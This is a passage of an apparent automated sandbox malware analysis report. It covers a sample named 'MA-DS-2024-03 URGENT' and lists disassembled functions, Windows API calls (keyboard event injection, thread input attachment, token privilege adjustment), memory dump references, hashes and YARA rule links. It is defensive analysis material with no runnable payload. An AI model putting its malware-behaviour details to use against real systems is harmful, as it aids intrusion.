                                                        • Instruction ID: a5fe8b5ebddeabdc03b7defa85b5706b3c04092d14be9d7edba4dc341e0ab760
                                                        • Opcode Fuzzy Hash: 067e945b42619cd5e532bb4c940c68e511b21f2bac583ba92795690b8c8a8ee6
                                                        • Instruction Fuzzy Hash: B4F0F431B11224EBDF11BFB2AC053AE36A0EF41328F91440EF42096281DB7C8951DB5D
                                                        Function 00404E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FreeLibrary.KERNEL32(?,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E7E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: FreeLibrary
                                                        • String ID:
                                                        • API String ID: 3664257935-0
                                                        • Opcode ID: 5e403c8a90df1ee0e06371f2d57000cd02bd76b5d635224a6d232ab0319aed21
                                                        • Instruction ID: e65952a518aebd30c2be6c87fe4ab6250acd6cacf129c027b051fb699af34d37
                                                        • Opcode Fuzzy Hash: 5e403c8a90df1ee0e06371f2d57000cd02bd76b5d635224a6d232ab0319aed21
                                                        • Instruction Fuzzy Hash: 85F01CB1501711CFCB349F64E494817B7E1BF94369320893FE2D692650C7359844DB84
                                                        Function 00420791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004207B0
                                                          • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: LongNamePath_memmove
                                                        • String ID:
                                                        • API String ID: 2514874351-0
                                                        • Opcode ID: 5311bc10bcd02c3da6376a961da6fa5eeea3c1e89524b7fc1d9ecfef85fbf38f
                                                        • Instruction ID: 9246c12fdc37fcd41ca4db90d4c6e7f6585ba1f285f6c4ea688713946de2f6cd
                                                        • Opcode Fuzzy Hash: 5311bc10bcd02c3da6376a961da6fa5eeea3c1e89524b7fc1d9ecfef85fbf38f
                                                        • Instruction Fuzzy Hash: F5E0263290012817C720E2599C05FEA77ACDF882A0F0401BAFC0CD3204D964AC808694
                                                        Function 00468E9F Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: __fread_nolock
                                                        • String ID:
                                                        • API String ID: 2638373210-0
                                                        • Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                        • Instruction ID: 3b5d1e22e3b7b83ea6e308f8ce2403907d65c91d4ff9c09852f69d04d9ef645c
                                                        • Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                        • Instruction Fuzzy Hash: BDE092B0204B005BD7388A24D800BA373E1AB05304F00091EF2AAC3341EB67B841C75D
                                                        Function 00405C4E Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,?,?,0043DD42,?,?,00000000), ref: 00405C5F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: FilePointer
                                                        • String ID:
                                                        • API String ID: 973152223-0
                                                        • Opcode ID: 14cfb4b96d04a2f7cb021406aaf56b6dbb63ecfee093867407aa16a4735cb87b
                                                        • Instruction ID: 2996e6a09d4b0f83628727b5f35a7304175fa4664712b8752db8e98aaff89e7d
                                                        • Opcode Fuzzy Hash: 14cfb4b96d04a2f7cb021406aaf56b6dbb63ecfee093867407aa16a4735cb87b
                                                        • Instruction Fuzzy Hash: 75D0C77464020CBFE710DB80DC46FAD777CD705710F200194FD0456290D6B27D548795
                                                        Function 0042525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: __wfsopen
                                                        • String ID:
                                                        • API String ID: 197181222-0
                                                        • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                        • Instruction ID: 26467e9723955137fe9c45439b6ceb4f873de5a2d7ef111d81715968119f48b2
                                                        • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                        • Instruction Fuzzy Hash: 99B0927654020CB7CE012A82FC02A593B199B41768F8080A1FB0C181A2A677A6649A99
                                                        Function 00441DE4 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 00441DF0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: PathTemp
                                                        • String ID:
                                                        • API String ID: 2920410445-0
                                                        • Opcode ID: c0665e8fbe40942abc26bfd634a772ce9cb0981408ba10bcaabf6bd0c700ab3d
                                                        • Instruction ID: cdab6d828b25e7ec8576945e7c24180a122b150f18df0bf6d50e7f80ea2f144b
                                                        • Opcode Fuzzy Hash: c0665e8fbe40942abc26bfd634a772ce9cb0981408ba10bcaabf6bd0c700ab3d
                                                        • Instruction Fuzzy Hash: C7C04C715500199BD715A754DC95AA8767CAB10705F4040EAB105D105196745B85CF29
                                                        Function 0046D07B Relevance: 1.4, APIs: 1, Instructions: 198COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLastError.KERNEL32(00000002,00000000), ref: 0046D1FF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast
                                                        • String ID:
                                                        • API String ID: 1452528299-0
                                                        • Opcode ID: db3d874e914dce79e7043b4d0cf5498309d9b82b561ceb4573be6442ffe9b797
                                                        • Instruction ID: fca64642930eea01f473371421ac76cd1d6e5c7f539a83d07f9f97c05c5cdcbf
                                                        • Opcode Fuzzy Hash: db3d874e914dce79e7043b4d0cf5498309d9b82b561ceb4573be6442ffe9b797
                                                        • Instruction Fuzzy Hash: 9D717674A043018FC704EF65C491A6AB7E0EF85318F04496EF996973A2DB38ED45CB5B
                                                        Function 00B65268 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287269734.0000000000B62000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B62000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_b62000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID:
                                                        • API String ID: 3472027048-0
                                                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                        • Instruction ID: 0c094cef02c869bca2be220748896a8de9747634ebdb6bd521d5ad1493701db1
                                                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                        • Instruction Fuzzy Hash: B5E0E67494020DDFDB00DFB4D54969D7BF4FF04301F1001A1FD05D2280D6309D608A62

                                                        Non-executed Functions

                                                        Function 0048CABC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 632windowkeyboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0048CB37
                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0048CB95
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0048CBD6
                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0048CC00
                                                        • SendMessageW.USER32 ref: 0048CC29
                                                        • _wcsncpy.LIBCMT ref: 0048CC95
                                                        • GetKeyState.USER32(00000011), ref: 0048CCB6
                                                        • GetKeyState.USER32(00000009), ref: 0048CCC3
                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0048CCD9
                                                        • GetKeyState.USER32(00000010), ref: 0048CCE3
                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0048CD0C
                                                        • SendMessageW.USER32 ref: 0048CD33
                                                        • SendMessageW.USER32(?,00001030,?,0048B348), ref: 0048CE37
                                                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0048CE4D
                                                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0048CE60
                                                        • SetCapture.USER32(?), ref: 0048CE69
                                                        • ClientToScreen.USER32(?,?), ref: 0048CECE
                                                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0048CEDB
                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0048CEF5
                                                        • ReleaseCapture.USER32 ref: 0048CF00
                                                        • GetCursorPos.USER32(?), ref: 0048CF3A
                                                        • ScreenToClient.USER32(?,?), ref: 0048CF47
                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0048CFA3
                                                        • SendMessageW.USER32 ref: 0048CFD1
                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0048D00E
                                                        • SendMessageW.USER32 ref: 0048D03D
                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0048D05E
                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0048D06D
                                                        • GetCursorPos.USER32(?), ref: 0048D08D
                                                        • ScreenToClient.USER32(?,?), ref: 0048D09A
                                                        • GetParent.USER32(?), ref: 0048D0BA
                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0048D123
                                                        • SendMessageW.USER32 ref: 0048D154
                                                        • ClientToScreen.USER32(?,?), ref: 0048D1B2
                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0048D1E2
                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0048D20C
                                                        • SendMessageW.USER32 ref: 0048D22F
                                                        • ClientToScreen.USER32(?,?), ref: 0048D281
                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0048D2B5
                                                          • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0048D351
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                        • String ID: @GUI_DRAGID$F$pbL
                                                        • API String ID: 3977979337-2097280626
                                                        • Opcode ID: 7eec303b30a7e05565a51c011a33495ec48739f70336c03353c9e9cc797f9edd
                                                        • Instruction ID: aa2ec0652ddf211ac3aa7531e5acae26c7b16f0e73498be5a03c601873f34f9f
                                                        • Opcode Fuzzy Hash: 7eec303b30a7e05565a51c011a33495ec48739f70336c03353c9e9cc797f9edd
                                                        • Instruction Fuzzy Hash: FE42DE74604640AFC720EF24D888EAEBBE5FF48310F140A2EF559973A1C735E855DB6A
                                                        Function 00416F9E Relevance: 55.8, APIs: 19, Strings: 10, Instructions: 5018COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: _memmove$_memset
                                                        • String ID: ]K$3cA$DEFINE$P\K$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_A
                                                        • API String ID: 1357608183-1426331590
                                                        • Opcode ID: b28a790e45669a4902d64bf1598fd7c3bcb7bf2305bb98875f8069baf6f44106
                                                        • Instruction ID: 24ac3008a4780d7342888deeabfce4e0a58b67e9339f094d14e98286774badb8
                                                        • Opcode Fuzzy Hash: b28a790e45669a4902d64bf1598fd7c3bcb7bf2305bb98875f8069baf6f44106
                                                        • Instruction Fuzzy Hash: A193A471A002199BDB24CF58C8817EEB7B1FF48315F24815BED45AB392E7789D86CB48
                                                        Function 004048D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetForegroundWindow.USER32(00000000,?), ref: 004048DF
                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0043D665
                                                        • IsIconic.USER32(?), ref: 0043D66E
                                                        • ShowWindow.USER32(?,00000009), ref: 0043D67B
                                                        • SetForegroundWindow.USER32(?), ref: 0043D685
                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0043D69B
                                                        • GetCurrentThreadId.KERNEL32 ref: 0043D6A2
                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043D6AE
                                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 0043D6BF
                                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 0043D6C7
                                                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 0043D6CF
                                                        • SetForegroundWindow.USER32(?), ref: 0043D6D2
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D6E7
                                                        • keybd_event.USER32(00000012,00000000), ref: 0043D6F2
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D6FC
                                                        • keybd_event.USER32(00000012,00000000), ref: 0043D701
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D70A
                                                        • keybd_event.USER32(00000012,00000000), ref: 0043D70F
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D719
                                                        • keybd_event.USER32(00000012,00000000), ref: 0043D71E
                                                        • SetForegroundWindow.USER32(?), ref: 0043D721
                                                        • AttachThreadInput.USER32(?,?,00000000), ref: 0043D748
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                        • String ID: Shell_TrayWnd
                                                        • API String ID: 4125248594-2988720461
                                                        • Opcode ID: c65cf632393a49513bea40c5a00901192d62317a1410f3ef3d84c68e5820f373
                                                        • Instruction ID: c1ca6a344bcdfaba0e974823023d667c19296b4d148af4653ab9434bf50545cf
                                                        • Opcode Fuzzy Hash: c65cf632393a49513bea40c5a00901192d62317a1410f3ef3d84c68e5820f373
                                                        • Instruction Fuzzy Hash: AE319671A40318BBEB206F619C49F7F7F6CEB48B50F10443AFA04EA1D1D6B45D11ABA9
                                                        Function 00458310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 004587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
                                                          • Part of subcall function 004587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
                                                          • Part of subcall function 004587E1: GetLastError.KERNEL32 ref: 00458865
                                                        • _memset.LIBCMT ref: 00458353
                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 004583A5
                                                        • CloseHandle.KERNEL32(?), ref: 004583B6
                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004583CD
                                                        • GetProcessWindowStation.USER32 ref: 004583E6
                                                        • SetProcessWindowStation.USER32(00000000), ref: 004583F0
                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0045840A
                                                          • Part of subcall function 004581CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00458309), ref: 004581E0
                                                          • Part of subcall function 004581CB: CloseHandle.KERNEL32(?,?,00458309), ref: 004581F2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                        • String ID: $default$winsta0
                                                        • API String ID: 2063423040-1027155976
                                                        • Opcode ID: a6581c019a875865fe98435da562a08335aaf20913fddee574ee62798222a6d0
                                                        • Instruction ID: 3323b63beeccf06d974511bf231c05544c13643482a2b8641c754c26865e528a
                                                        • Opcode Fuzzy Hash: a6581c019a875865fe98435da562a08335aaf20913fddee574ee62798222a6d0
                                                        • Instruction Fuzzy Hash: F3814871900209BFDF119FA5DC45AEE7B78AF08305F14416EFC10B6262EF399A19DB28
                                                        Function 0046C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0046C78D
                                                        • FindClose.KERNEL32(00000000), ref: 0046C7E1
                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0046C806
                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0046C81D
                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0046C844
                                                        • __swprintf.LIBCMT ref: 0046C890
                                                        • __swprintf.LIBCMT ref: 0046C8D3
                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                        • __swprintf.LIBCMT ref: 0046C927
                                                          • Part of subcall function 00423698: __woutput_l.LIBCMT ref: 004236F1
                                                        • __swprintf.LIBCMT ref: 0046C975
                                                          • Part of subcall function 00423698: __flsbuf.LIBCMT ref: 00423713
                                                          • Part of subcall function 00423698: __flsbuf.LIBCMT ref: 0042372B
                                                        • __swprintf.LIBCMT ref: 0046C9C4
                                                        • __swprintf.LIBCMT ref: 0046CA13
                                                        • __swprintf.LIBCMT ref: 0046CA62
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
